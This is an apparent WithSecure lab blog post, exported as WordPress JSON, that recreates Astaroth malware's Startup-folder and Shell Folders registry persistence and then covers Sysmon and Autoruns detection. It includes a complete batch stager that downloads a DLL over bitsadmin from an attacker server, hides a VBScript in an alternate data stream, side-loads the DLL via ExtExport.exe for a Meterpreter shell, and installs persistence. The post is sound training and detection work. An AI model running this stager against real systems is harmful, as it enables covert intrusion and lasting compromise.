{"id":10579,"date":"2020-07-03T09:00:00","date_gmt":"2020-07-03T08:00:00","guid":{"rendered":"https:\/\/www.withsecure.com\/resources-hub\/w-labs\/attack-detection-fundamentals-code-execution-and-persistence-lab-2\/"},"modified":"2026-05-25T10:34:16","modified_gmt":"2026-05-25T09:34:16","slug":"attack-detection-fundamentals-code-execution-and-persistence-lab-2","status":"publish","type":"lab_item","link":"https:\/\/www.withsecure.com\/jp-ja\/resources-hub\/w-labs\/attack-detection-fundamentals-code-execution-and-persistence-lab-2\/","title":{"rendered":"Attack Detection Fundamentals: Code Execution and Persistence &#8211; Lab #2"},"content":{"rendered":"<section\n    class=\"wp-block-one-column-block edwp-block js-wp-block-one-column-block wp-block-one-column-block--content-1 wp-block-one-column-block--meta-sharing layout--spacing-xxxxl-top layout--spacing-xl-bottom\"\n    >\n    <div class=\"wp-block-one-column-block__container\">\n                                                                                                                            <div class='wp-block-one-column-block__meta-sharing-grid'><div class=\"wp-component-content wp-component-content--default wp-block-one-column-block__content fade-in\">\n            <h1 class=\"wp-component-heading text--h2 wp-component-content__title\">\n    Attack Detection Fundamentals: Code Execution and Persistence &#8211; <span class=\"blue-text\">Lab #2<\/span><\/h1>                    <div class=\"wp-component-content__inner\">\n                                                    <div class=\"wp-component-content__meta\">\n                                                                            <span class=\"wp-component-content__meta-categories\">\n                                                                    <span class=\"wp-component-content__meta-category\">\n                                        Attack Detection                                    <\/span>\n                                     
<div class=\"wp-block-two-column-block__right\">\n                                <div class=\"wp-component-paragraph wp-block-two-column-block__paragraph \">\n    <p>In the second part of WithSecure Consulting&#x27;s Attack Detection Workshop series, covering Code Execution and Persistence, we explored a number of offensive techniques for achieving code execution and maintaining a foothold within a target environment.<\/p>\n<p>We emulated the TTPs used by Astaroth malware to do this, and saw how living-off-the-land binaries (LOLBins), DLL side-loading and alternate data streams could be put to use by threat actors. In the second lab, we adapted our malware to include two persistence techniques. We also explored the detection strategies that can be employed to spot these using our own detection stacks. The following blog provides a final step-by-step guide to recreating the demos from that Code Execution and Persistence workshop, as well as exercises to further the reader&#x27;s understanding of the concepts shown.<\/p>\n<p>A recording of the workshop can be found <a href=\"https:\/\/youtu.be\/C0M4BHa1Gv4\" target=\"_blank\" rel=\"noopener\">here<\/a>.<\/p>\n<p>In this final lab, we are going to deal with Persistence, again grabbing inspiration from TTPs the real-world threat Astaroth used in its latest campaign. Contrasting with some of the more esoteric techniques we saw in the previous lab, the actor chose two more traditional and straightforward techniques for maintaining their foothold. We are going to reuse the lab setup and most of the resources we developed in the <a href=\"https:\/\/labs.withsecure.com\/blog\/attack-detection-fundamentals-code-execution-and-persistence-lab-1\/\" target=\"_blank\" rel=\"noopener\">first<\/a> lab, so it is encouraged that the reader get familiar with the previous lab if they have not yet do so. 
Again, we are going to take a simplified approach to the real techniques the Astaroth malware campaign used earlier this year, so I also recommend taking a look at Microsoft Defender ATP Research Team&#x27;s blog <a href=\"https:\/\/www.microsoft.com\/security\/blog\/2020\/03\/23\/latest-astaroth-living-off-the-land-attacks-are-even-more-invisible-but-not-less-observable\/\" target=\"_blank\" rel=\"noopener\">post<\/a> to get a better picture of how the attack works.<\/p>\n<p>As in the real incidents we have dealt with, we are going to use two techniques that add code to the start process by modifying the registry run keys and start up folder.<\/p>\n<h2>Registry Run Keys and Startup Folder<\/h2>\n<p>As mentioned in the introduction, the actors behind the Astaroth campaign decided to go with a more old school, tried and tested approach for their attempt at persistence than the rare code execution techniques we examined in the first lab. I guess they went with the old mantra: &quot;If something works, why change it?&quot;. Even if these techniques are not as comparatively stealthy as other approaches, they are still reliable and efficient in what they do. Furthermore, for the purposes of our workshop, they adequately demonstrate some detection strategies that will further the reader&#x27;s understanding and are easy to implement.<\/p>\n<h3>Startup Folder<\/h3>\n<p>One means of persistence is to create a file in the user&#x27;s &quot;Start Up&quot; folder. 
As the name suggests, when that user logs on Explorer opens every item in this folder, so executables, scripts and shortcuts (.lnk files, as used by this lab&#x27;s launcher) placed here all run. Note that this happens at logon, not at system boot.<\/p>\n<p>The path of this folder is as follows:<\/p>\n<pre><code class=\"language-bash\">C:\\Users\\&lt;username&gt;\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\<\/code><\/pre>\n<p>It is important to note here that anything that gets executed this way will run in the security context of the user logging in, with that user&#x27;s privileges.<\/p>\n<p>Notably, if we have administrative privileges, we could instead use the system-wide StartUp folder, located in:<\/p>\n<pre><code class=\"language-bash\">C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Startup<\/code><\/pre>\n<p>This way our payload would load any time a user logs into the system, no matter who they are (although, the file would still be executed under that user&#x27;s privileges, not as SYSTEM or as the administrator who planted it).<\/p>\n<h3>Registry Run Keys<\/h3>\n<p>By adding an entry to certain locations inside the Windows Registry (known as &quot;Run Keys&quot;) an attacker is able to get code executed every time a user logs on: HKCU keys fire for that user only, HKLM keys fire for every user. Like the Startup folder, these are processed at logon rather than at boot. 
As with the &quot;Start Up&quot; folders described above, here we also have user-specific locations and system wide locations (that also require administrative privileges to be modified).<\/p>\n<h3>HKEY_CURRENT_USER (HKCU)<\/h3>\n<p>Entries added to the Run Keys in the Current User Registry Hive (HKCU) will get executed every time the compromised user logs in.<\/p>\n<p>The following list shows the most common locations to achieve persistence under the context of the current user.<\/p>\n<pre><code class=\"language-bash\">HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\nHKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\nHKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\RunServices\nHKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\RunServicesOnce<\/code><\/pre>\n<p>Two caveats on that list: RunOnce entries are deleted as soon as they have run, so they give a single execution rather than durable persistence, and RunServices \/ RunServicesOnce are legacy keys from the Windows 9x\/Me era that modern, NT-based Windows does not process. In practice, Run is the key to plant in and to monitor.<\/p>\n<p>We can modify one such location and add a value to get our code executed every time the user logs in with the following command (the value data is a full command line, so arguments can be included):<\/p>\n<pre><code class=\"language-bash\">REG ADD HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Run \/v &lt;name&gt; \/t REG_SZ \/d &lt;filepath&gt;<\/code><\/pre>\n<h3>HKEY_LOCAL_MACHINE (HKLM)<\/h3>\n<p>On the other hand, entries added to the Run Keys in the System or Local Machine Registry Hive (HKLM) will get executed every time any user logs in to the system.<\/p>\n<pre><code class=\"language-bash\">HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\nHKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\nHKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\RunServices\nHKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\RunServicesOnce<\/code><\/pre>\n<p>And the command to modify one of these keys, and add our system wide persistence value, is as follows (remember we do need administrative privileges to tinker with this):<\/p>\n<pre><code class=\"language-bash\">REG ADD 
HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\Run \/v &lt;name&gt; \/t REG_SZ \/d &lt;filepath&gt;<\/code><\/pre>\n<p>Additionally, there is a related but different technique. The Shell Folders and User Shell Folders keys below do not list programs to run; their StartUp value tells Explorer where the Startup folder is. Overwriting that value redirects the Startup folder to an attacker-chosen location, whose contents are then executed at logon exactly as described above:<\/p>\n<pre><code class=\"language-bash\">HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\User Shell Folders\nHKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Shell Folders\nHKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Shell Folders\nHKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\User Shell Folders<\/code><\/pre>\n<p>In fact, this is what the Astaroth malware did. Rather than adding a Run entry, the attackers rewrote the StartUp value under the key listed below, and we will do the same in our lab. (On current Windows, User Shell Folders is generally the location Explorer consults, with Shell Folders acting as a cache of the expanded paths; if the reboot test below does not behave as expected, confirm which of the two your target honours.)<\/p>\n<pre><code class=\"language-bash\">HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Shell Folders<\/code><\/pre>\n<p>Finally, there are still more locations and methods to achieve persistence using this technique, so I recommend doing some more research on the topic to get a more thorough view on this.<\/p>\n<h2>References<\/h2>\n<ul>\n<li><a href=\"https:\/\/www.microsoft.com\/security\/blog\/2020\/03\/23\/latest-astaroth-living-off-the-land-attacks-are-even-more-invisible-but-not-less-observable\/\" target=\"_blank\" rel=\"noopener\">Microsoft Defender ATP Astaroth<\/a><\/li>\n<li><a href=\"https:\/\/www.fuzzysecurity.com\/tutorials\/19.html\" target=\"_blank\" rel=\"noopener\">Fuzzy Security &#8211; Windows Userland Persistence Fundamentals<\/a><\/li>\n<li><a href=\"https:\/\/azeria-labs.com\/persistence\/\" target=\"_blank\" rel=\"noopener\">Azeria Labs &#8211; Persistence<\/a><\/li>\n<li><a href=\"https:\/\/docs.microsoft.com\/en-gb\/windows\/win32\/setupapi\/run-and-runonce-registry-keys?redirectedfrom=MSDN\" target=\"_blank\" 
rel=\"noopener\">Windows &#8211; Run and RunOnce Registry Keys<\/a><\/li>\n<li><a href=\"https:\/\/docs.microsoft.com\/en-us\/windows-server\/administration\/windows-commands\/reg\" target=\"_blank\" rel=\"noopener\">Windows &#8211; Reg Command<\/a><\/li>\n<li><a href=\"https:\/\/attack.mitre.org\/tactics\/TA0003\/\" target=\"_blank\" rel=\"noopener\">MITRE ATT&amp;CK &#8211; Persistence<\/a><\/li>\n<li><a href=\"https:\/\/attack.mitre.org\/techniques\/T1060\/\" target=\"_blank\" rel=\"noopener\">MITRE ATT&amp;CK &#8211; Registry Run Keys \/ Startup Folder (T1060, since superseded by T1547.001)<\/a><\/li>\n<li><a href=\"https:\/\/www.offensive-security.com\/metasploit-unleashed\/\" target=\"_blank\" rel=\"noopener\">Offensive Security &#8211; Metasploit Unleashed<\/a><\/li>\n<li><a href=\"https:\/\/github.com\/Neo23x0\/sigma\" target=\"_blank\" rel=\"noopener\">Sigma Rules<\/a><\/li>\n<\/ul>\n<h2>Required Tools<\/h2>\n<ul>\n<li>Attacking VM <a href=\"https:\/\/www.kali.org\/\" target=\"_blank\" rel=\"noopener\">Kali Linux<\/a><\/li>\n<li>Target VM (Windows with AV and Firewall disabled). Keep both VMs on an isolated, host-only network and take a clean snapshot of the target first: the stager downloads and executes a Meterpreter DLL and installs persistence that survives reboots, so you want a guaranteed way back to a clean state.<\/li>\n<li>SimpleHTTPServer (Python module)<\/li>\n<li><a href=\"https:\/\/www.metasploit.com\/\" target=\"_blank\" rel=\"noopener\">Metasploit<\/a><\/li>\n<li>Windows Registry Editor (Regedit)<\/li>\n<li><a href=\"https:\/\/docs.microsoft.com\/en-gb\/sysinternals\/downloads\/autoruns\" target=\"_blank\" rel=\"noopener\">Autoruns<\/a><\/li>\n<\/ul>\n<h2>Walkthrough<\/h2>\n<p>All the steps to create the payloads and set up the C2 server remain the same as in the previous lab. 
The only changes we need to make to carry out this new version of the simulation &#8211; with persistence included &#8211; is to add the persistence mechanisms to the stager payload.<\/p>\n<h3>Stager Creation (With Persistence)<\/h3>\n<p>To achieve persistence we are going to add two new lines of code to this stager file.<\/p>\n<h3>Add the Payload to the User&#x27;s Start Up Folder<\/h3>\n<p>The first line will add a copy of our launcher payload to the user&#x27;s Start Up folder.<\/p>\n<pre><code class=\"language-bash\">copy &lt;filepath&gt; &quot;C:\\Users\\&lt;username&gt;\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\&lt;filename&gt;&quot;<\/code><\/pre>\n<figure><img decoding=\"async\" src=\"https:\/\/www.withsecure.com\/wp-content\/smush-webp\/2026\/05\/startup-launcher.png.webp\" alt=\"\" class=\"wp-component-image\" \/><\/figure>\n<h3>Startup Folder Redirection via the User Registry Hive<\/h3>\n<p>The second line of code does not touch a Run key. It overwrites the StartUp value under the user&#x27;s Shell Folders key &#8211; the location Explorer uses for the Startup folder &#8211; with a path pointing at our payload. Two things to be aware of: Explorer expects a directory in this value, whereas the lab writes the launcher&#x27;s file path; and because the stager also copies the launcher into the real Startup folder, the reboot test below will succeed whether or not this registry change works. To exercise the registry technique on its own, comment out the copy line and try pointing the value at the directory holding the launcher.<\/p>\n<pre><code class=\"language-bash\">REG ADD &quot;HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Shell Folders&quot; \/f \/v StartUp \/t REG_SZ \/d &lt;filepath&gt;<\/code><\/pre>\n<p>The flags used on this command mean the following:<\/p>\n<ul>\n<li>\/f &#8211; Overwrites an existing value without prompting for confirmation (needed here, since the StartUp value normally already exists with the default path).<\/li>\n<li>\/v &#8211; Specifies the name of the registry entry.<\/li>\n<li>\/t &#8211; Specifies the type for the registry entry.<\/li>\n<li>\/d &#8211; Specifies the data for the new registry entry.<\/li>\n<\/ul>\n<figure><img decoding=\"async\" src=\"https:\/\/www.withsecure.com\/wp-content\/smush-webp\/2026\/05\/reg-add.png.webp\" alt=\"\" class=\"wp-component-image\" \/><\/figure>\n<h3>Stager v2.0 Code<\/h3>\n<p>You can find the complete code for the new stager below.<\/p>\n<pre><code class=\"language-bash\">@echo off\n\nsetlocal enabledelayedexpansion\n\nset 
SERVER=http:\/\/192.168.40.128\/\n\nset PATH_PUBLIC_DIR=C:\\Users\\Public\\Libraries\\raw\\\nrem Create the target directoty if it does not exist.\nif not exist &quot;%PATH_PUBLIC_DIR%&quot; mkdir %PATH_PUBLIC_DIR%\n\nset PAYLOAD_DLL=payload.dll\nset TARGET_ADS=desktop.ini\nset LAUNCHER_LNK=launcher.lnk\nset LAUNCHER_CREATE_VBS=launcher_create.vbs\n\nset URL_PAYLOAD_DLL=%SERVER%%PAYLOAD_DLL%\n\nrem ExtExport.exe looks for any DLL with the following names.\nset EXTEXPORT_DLLS[1]=mozcrt19.dll\nset EXTEXPORT_DLLS[2]=mozsqlite3.dll\nset EXTEXPORT_DLLS[3]=sqlite3.dll\n\nrem Select one DLL filename at random.\nset \/a _rand=%RANDOM% %% 3 + 1\nset EXTEXPORT_DLL=!EXTEXPORT_DLLS[%_rand%]!\n\nset PATH_EXTEXPORT_DLL=%PATH_PUBLIC_DIR%%EXTEXPORT_DLL%\nset PATH_LAUNCHER_LNK=%PATH_PUBLIC_DIR%%LAUNCHER_LNK%\nset PATH_LAUNCHER_CREATE_VBS=%PATH_PUBLIC_DIR%%LAUNCHER_CREATE_VBS%\n\nset PATH_LAUNCHER_CREATE_ADS=%PATH_PUBLIC_DIR%%TARGET_ADS%:%LAUNCHER_CREATE_VBS%\n\nset PATH_EXTEXPORT_EXE=C:\\Program Files (x86)\\Internet Explorer\\Extexport.exe\nset EXTEXPORT_ARGS=C:\\Users\\Public\\Libraries\\raw foo bar\n\nrem Download the renamed DLL payload from the server.\nbitsadmin \/transfer 2 \/priority FOREGROUND %URL_PAYLOAD_DLL% %PATH_EXTEXPORT_DLL%\n\nrem Use a temporary VBScript to create the LNK launcher.\nrem The launcher will take the renamed DLL payload and load it using ExtExport.\necho Set oWS = WScript.CreateObject(&quot;WScript.Shell&quot;) &gt; %PATH_LAUNCHER_CREATE_VBS%\necho sLinkFile = &quot;%PATH_LAUNCHER_LNK%&quot; &gt;&gt; %PATH_LAUNCHER_CREATE_VBS%\necho Set oLink = oWS.CreateShortcut(sLinkFile) &gt;&gt; %PATH_LAUNCHER_CREATE_VBS%\necho oLink.TargetPath = &quot;%PATH_EXTEXPORT_EXE%&quot; &gt;&gt; %PATH_LAUNCHER_CREATE_VBS%\necho oLink.Arguments = &quot;%EXTEXPORT_ARGS%&quot; &gt;&gt; %PATH_LAUNCHER_CREATE_VBS%\necho oLink.Save &gt;&gt; %PATH_LAUNCHER_CREATE_VBS%\n\nrem Copy the launcher creation VBScript to the Alternate Data Stream (ADS) of desktop.ini and erase it.\ntype 
%PATH_LAUNCHER_CREATE_VBS% &gt; %PATH_LAUNCHER_CREATE_ADS% &amp;&amp; erase %PATH_LAUNCHER_CREATE_VBS%\n\nrem Execute the launcher creation VBScript from the Alternate Data Stream (ADS).\ncscript %PATH_LAUNCHER_CREATE_ADS%\n\nrem #############################################################################\n\nrem Persistence Code Added Here\nrem ---------------------------\n\nrem Copy the Launcher to the user&#x27;s startup folder.\ncopy %PATH_LAUNCHER_LNK% &quot;C:\\Users\\%USERNAME%\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\%LAUNCHER_LNK%&quot;\n\nrem Redirect the Startup folder: overwrite the StartUp value under the user&#x27;s Shell Folders key (this is not a Run key).\nREG ADD &quot;HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Shell Folders&quot; \/f \/v StartUp \/t REG_SZ \/d %PATH_LAUNCHER_LNK%\n\nrem ###########################################################################\n\nrem Execute the LNK launcher. This will use ExtExport.exe to side load and execute the DLL payload.\nstart \/b %PATH_LAUNCHER_LNK%<\/code><\/pre>\n<p>This file will work in the same way as before, with the added benefit that it now calls back to us again every time the compromised user logs on after a reboot. Both mechanisms are scoped to that user&#x27;s profile and HKCU hive, so nothing runs for other users or before that user logs on, and the callback runs with that user&#x27;s privileges, not elevated.<\/p>\n<h3>Executing the Attack<\/h3>\n<figure><img decoding=\"async\" src=\"https:\/\/www.withsecure.com\/wp-content\/smush-webp\/2026\/05\/persistence-flow-dark.png.webp\" alt=\"\" class=\"wp-component-image\" \/><\/figure>\n<p>The steps to carry out the attacks are the same as in the first lab, but now we will also reboot our target machine and restart our listener to test for persistence.<\/p>\n<p>These steps are recreated below:<\/p>\n<ul>\n<li>The first step is to move the <code>create_dropper_lnk.bat<\/code> batch file to the Windows VM (Desktop works) that will act as the target and execute it. 
This will create a shortcut file named &quot;clickme.lnk&quot; that will imitate the Infection Vector in the real attack.<\/li>\n<li>On the attacking machine, move to the directory where the payloads are stored and set up a HTTP server as described above.<\/li>\n<li>Open up a Metasploit console and set up a listener for a reverse Meterpreter shell over TCP, again following the steps already outlined.<\/li>\n<li>Back to the target machine, it is time for the user to click on that completely benign looking file. This will trigger the whole attack chain.<\/li>\n<li>Turns out the &quot;clickme&quot; shortcut file is a dropper! Who would have though. Anyway, after executing, this binary uses BITSAdmin to fetch the next step of the attack chain, a stager batch file. This stager gets automatically executed and performs two actions:<\/li>\n<li>First it reaches back to our C2 server, retrieves our DLL payload, renames it and stores it in &quot;C:\\Users\\Public\\Libraries\\raw\\&quot;.<\/li>\n<li>Second, it generates a VBS script and copies it to the Alternate Data Stream of &quot;desktop.ini&quot; inside the same directory, hiding it from unwanted eyes. The original script is immediately deleted.<\/li>\n<li>This now hidden script is accessed and executed by the stager, creating the final launcher file in shortcut format (.lnk).<\/li>\n<li>Almost there. On its final step, the stager executes the shortcut file, which launches ExtExport.exe &#8211; a LOLBin bundled in Internet Explorer &#8211; pointing to the directory where the aptly renamed DLL payload is stored. If successful, the DLL is side-loaded and the embedded payload executed.<\/li>\n<li>Voila! A Meterpreter shell spawns in the terminal of our attacking machine. Good job! 
Now let&#x27;s test for persistence.<\/li>\n<li>First navigate to the user Start Up folder <code>C:\\Users\\%USERNAME%\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\<\/code> and check that a copy of our launcher has successfully been copied there.<\/li>\n<li>Now let&#x27;s make use of an internal Windows tool called Regedit to check if the registry value has been changed too. Open the search bar in the taskbar and type <code>regedit<\/code>. You need to run this with administrative rights. Once inside Regedit&#x27;s interface, navigate to <code>HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Shell Folders<\/code>. Check the data of the value named &quot;StartUp&quot; in the right-hand pane. If the stager script was successful, it should now contain the path to our launcher LNK instead of the default Startup folder path.<\/li>\n<li>Time for the final test: Shut down your target Windows VM. Your Meterpreter shell should die shortly afterwards.<\/li>\n<li>Restart the listener on the Metasploit console in our C2 machine.<\/li>\n<li>Reboot the target Windows VM and log in as the same user. Both persistence mechanisms live in that user&#x27;s profile and HKCU hive, so logging in as anyone else will not trigger them.<\/li>\n<li>Back in your attacking VM you should now see a shiny new Meterpreter shell coming up. Victory! Persistence has been achieved! When you are done, revert the target to its clean snapshot (or delete the Startup folder copy and restore the StartUp value); otherwise it will keep calling back on every logon.<\/li>\n<\/ul>\n<h2>Detection<\/h2>\n<p>We are now aware of how the attackers behind the Astaroth campaign achieved their persistence. 
So the question is, how do we detect them?<\/p>\n<p>The following section describes some of the ways in which the abuse of the techniques we just discussed can be detected, with a few insights into some of the implementations Countercept used when facing this threat.<\/p>\n<p>Most of the tools we are going to use to this end can be categorised as one of the following types:<\/p>\n<ul>\n<li>Event Logs<\/li>\n<li>Stand Alone Tools and Scripts<\/li>\n<li>Sigma Rules<\/li>\n<\/ul>\n<p>Apart from the event logs, to follow along with some of the examples we recommend installing the following tools:<\/p>\n<ul>\n<li><a href=\"https:\/\/github.com\/Neo23x0\/sigma#sigmac\" target=\"_blank\" rel=\"noopener\">Sigma &#8211; Sigmac<\/a><\/li>\n<li><a href=\"https:\/\/docs.microsoft.com\/en-us\/sysinternals\/downloads\/sysmon\" target=\"_blank\" rel=\"noopener\">Sysmon<\/a> (SwiftOnSecurity&#x27;s <a href=\"https:\/\/github.com\/SwiftOnSecurity\/sysmon-config\" target=\"_blank\" rel=\"noopener\">config<\/a> is a good starting point; before relying on it, check that its RegistryEvent and FileCreate include rules cover the Explorer\\Shell Folders and User Shell Folders keys and both Startup folder paths, not only Run\/RunOnce, otherwise one half of this lab will produce no event at all)<\/li>\n<li><a href=\"https:\/\/docs.microsoft.com\/en-gb\/sysinternals\/downloads\/autoruns\" target=\"_blank\" rel=\"noopener\">Sysinternals&#x27; Autoruns<\/a><\/li>\n<\/ul>\n<h3>Sysinternals Autoruns<\/h3>\n<p>The Autoruns utility from the Sysinternals suite is probably the easiest way to monitor any startup location susceptible to being abused by an attacker to achieve persistence. The tool looks into all the startup locations in the system and shows every program or executable that is configured to run during system bootup or user log in. 
This includes of course the Startup folder and the registry keys we have been talking about throughout this guide.<\/p>\n<p>Not only that but it also checks for files that are configured to run when other built-in Windows applications are launched, like Explorer, Internet Explorer or media players, which can also be abused by attackers to make them execute extraneous code.<\/p>\n<p>Finally, the tool offers a wide range of options to filter and zoom in on any suspicious file or group of files to get a closer look into any anomalies in the startup process.<\/p>\n<p>Although the advanced usage of this tool goes beyond the scope of this guide, Autoruns should be one of the assets in any system administrator or blue teamer&#x27;s toolset.<\/p>\n<h3>Startup File Detection<\/h3>\n<p>Focusing on specific detections, persistence by the method of creating a file in the startup folder can be detected in the following manner.<\/p>\n<p>If we have Sysmon installed as part of our detection stack, we can look for file creation events (EID 11, FileCreate) whose target filename is inside the Startup folder directory, which would point to a new file being added in this location. (EID 12 and 13 are registry events and will not show this file write.)<\/p>\n<p>We can then filter down these events by checking other data like the actual name of the process that created the file and the extension of the file itself, comparing them to a list of usual suspects to get better context on the file creation process. Treat such lists as context rather than a hard filter: an attacker can rename the dropping process or drop a script or shortcut file instead of an executable, so an exclusion based purely on process name or extension is easy to evade.<\/p>\n<p>Finally, all of this could then be implemented in a rule in whatever format we use and fed to our SIEM to start monitoring for these occurrences.<\/p>\n<h3>Registry Run Keys Detection<\/h3>\n<p>When it comes to monitoring persistence techniques that rely on modifying Registry Keys, the process is not very different from what has been outlined above.<\/p>\n<p>Sysmon events with EID 12 (registry key created or deleted) and EID 13 (registry value set) point to actions that have modified an entry in the registry; the value redirect used in this lab, where the &quot;Startup&quot; value under <code>Explorer\\Shell Folders<\/code> is rewritten, shows up as an EID 13 event. 
If we ingest these records, we can then check the image that performed the action and the &quot;TargetObject&quot; to see if the write was pointing to a Run Key, or to the <code>Explorer\\Shell Folders<\/code> &quot;Startup&quot; value abused in this lab. And just like with Sysmon, events in the Windows Security Log with an EID 4657 (A registry value was modified) also bring up the same type of actions, so we can use the same approach to develop monitoring capabilities over registry modifications. Bear in mind that 4657 is only generated when the &quot;Audit Registry&quot; object access subcategory is enabled and the monitored key carries a SACL covering write access; without that audit configuration the Security Log stays silent on these changes.<\/p>\n<p>If we are correctly logging and parsing the whole command, we can also check if there is any file extension in the arguments, and again compare it to a list of usual suspects (executables) to further filter out false positives and create a more efficient detection rule.<\/p>\n<h2>Conclusions<\/h2>\n<p>As in the previous lab, we&#x27;ve had the chance to execute and detect real world techniques presented in an easy to digest format. In the case of this second lab, the focus was on techniques that allow an attacker to achieve persistence in a system, and to do so we once more picked examples from the Astaroth malware campaign.<\/p>\n<p>We looked at one of the simplest techniques out there: copying a payload into the user&#x27;s Startup folder. We then stepped into another simple but widely used technique, modifying Run Keys or certain registry locations to achieve persistence across reboots. We explored detection mechanisms that exist to counter these threats, gaining a better understanding of them and ways to implement them.<\/p>\n<p>We hope this guide has provided a little more insight into persistence and set you on the path to gaining a deeper knowledge of the topic. 
And of course, try the labs if you have not done so yet!<\/p>\n<\/div>\n<section\n    class=\"wp-block-sharing-icons edwp-block wp-block-sharing-icons--disable-border wp-block-sharing-icons--disable-container wp-block-two-column-block__share wp-block-two-column-block__mobile-after-right wp-block-two-column-block__share wp-block-two-column-block__mobile-after-right\"\n    >\n    <div class=\"wp-block-sharing-icons__container\">\n        <div class=\"wp-block-sharing-icons__inner\">\n                            <p class=\"wp-block-sharing-icons__title fade-in\">\n                    Share this story                <\/p>\n                        <div class=\"wp-component-socials wp-component-socials--dark-mode\">\n    \n            <a href=\"https:\/\/www.linkedin.com\/shareArticle?mini=true&#038;url=https:\/\/www.withsecure.com\/jp-ja\/resources-hub\/w-labs\/attack-detection-fundamentals-code-execution-and-persistence-lab-2\/&#038;title=Attack%20Detection%20Fundamentals:%20Code%20Execution%20and%20Persistence%20&#8211;%20Lab%20#2\" target=\"_blank\" rel=\"noreferer noopener\" class=\"wp-component-socials__link\" title=\"Linkedin\u3067\u5171\u6709\u3059\u308b\">\n            <svg class='edwp-icon edwp-icon--xlg js-icon ' aria-hidden='true'>\n                <use xlink:href='#linkedin'><\/use>\n            <\/svg>        <\/a>\n    \n            <a href=\"http:\/\/x.com\/share?text=Attack Detection Fundamentals: Code Execution and Persistence &#8211; Lab #2&#038;url=https:\/\/www.withsecure.com\/jp-ja\/resources-hub\/w-labs\/attack-detection-fundamentals-code-execution-and-persistence-lab-2\/\" target=\"_blank\" rel=\"noreferer noopener\" class=\"wp-component-socials__link wp-component-socials__link--twitter\" title=\"\u30c4\u30a4\u30c3\u30bf\u30fc\u3067\u5171\u6709\">\n            <svg class='edwp-icon edwp-icon--xlg js-icon ' aria-hidden='true'>\n                <use xlink:href='#x'><\/use>\n            <\/svg>        <\/a>\n    \n    \n    <\/div>\n        <\/div>\n 
xlink:href='#chevron'><\/use>\n            <\/svg>                    <\/div>\n                <\/div>\n            <\/div>\n                                    <\/div>\n<\/section>\n","protected":false},"excerpt":{"rendered":"<p>In this final lab, we are going to deal with Persistence, again grabbing inspiration from TTPs the real-world threat Astaroth used in its latest campaign<\/p>\n","protected":false},"author":3,"featured_media":0,"template":"","categories":[314,315,316],"labs_content_type":[317],"class_list":["post-10579","lab_item","type-lab_item","status-publish","hentry","category-attack-detection","category-software-protection","category-threat-intelligence"],"acf":[],"card":"<div class=\"wp-component-card-insight js-card-link wp-component-card-insight--highlighted\">\n    <div class=\"wp-component-card-insight__image-wrapper\">\n        <img width=\"618\" height=\"440\" src=\"https:\/\/www.withsecure.com\/wp-content\/uploads\/2026\/05\/placeholder.jpg\" class=\"wp-component-card-insight__image\" alt=\"\" decoding=\"async\" loading=\"lazy\" srcset=\"https:\/\/www.withsecure.com\/wp-content\/uploads\/2026\/05\/placeholder.jpg 618w, https:\/\/www.withsecure.com\/wp-content\/uploads\/2026\/05\/placeholder-300x214.jpg 300w, https:\/\/www.withsecure.com\/wp-content\/uploads\/2026\/05\/placeholder-447x318.jpg 447w, https:\/\/www.withsecure.com\/wp-content\/uploads\/2026\/05\/placeholder-205x146.jpg 205w\" sizes=\"auto, (max-width: 618px) 100vw, 618px\" \/>                    <p class=\"wp-component-card-insight__content-type\">W\/\u30e9\u30dc<\/p>\n            <\/div>\n    <div class=\"wp-component-card-insight__content\">\n                    <div class=\"wp-component-card-insight__meta\">\n                <div class=\"wp-component-card-insight__categories\">\n                                            <span class=\"wp-component-card-insight__category\">Attack Detection<\/span>\n                                            <span 
class=\"wp-component-card-insight__category\">Software Protection<\/span>\n                                            <span class=\"wp-component-card-insight__category\">Threat intelligence<\/span>\n                                    <\/div>\n            <\/div>\n                            <h3 class=\"wp-component-card-insight__title\">Attack Detection Fundamentals: Code Execution and Persistence &#8211; Lab #2<\/h3>\n                                            <p class=\"wp-component-card-insight__desc\">In this final lab, we are going to deal with Persistence, again grabbing inspiration from TTPs the real-world threat Astaroth used in its latest campaign<\/p>\n                            <div class=\"wp-component-card-insight__button-wrapper\">\n                <a class=\"wp-component-button btn btn--primary btn--dark wp-component-card-insight__button btn--small\" href=\"https:\/\/www.withsecure.com\/jp-ja\/resources-hub\/w-labs\/attack-detection-fundamentals-code-execution-and-persistence-lab-2\/\">\u3082\u3063\u3068\u8aad\u3080<\/a>            <\/div>\n            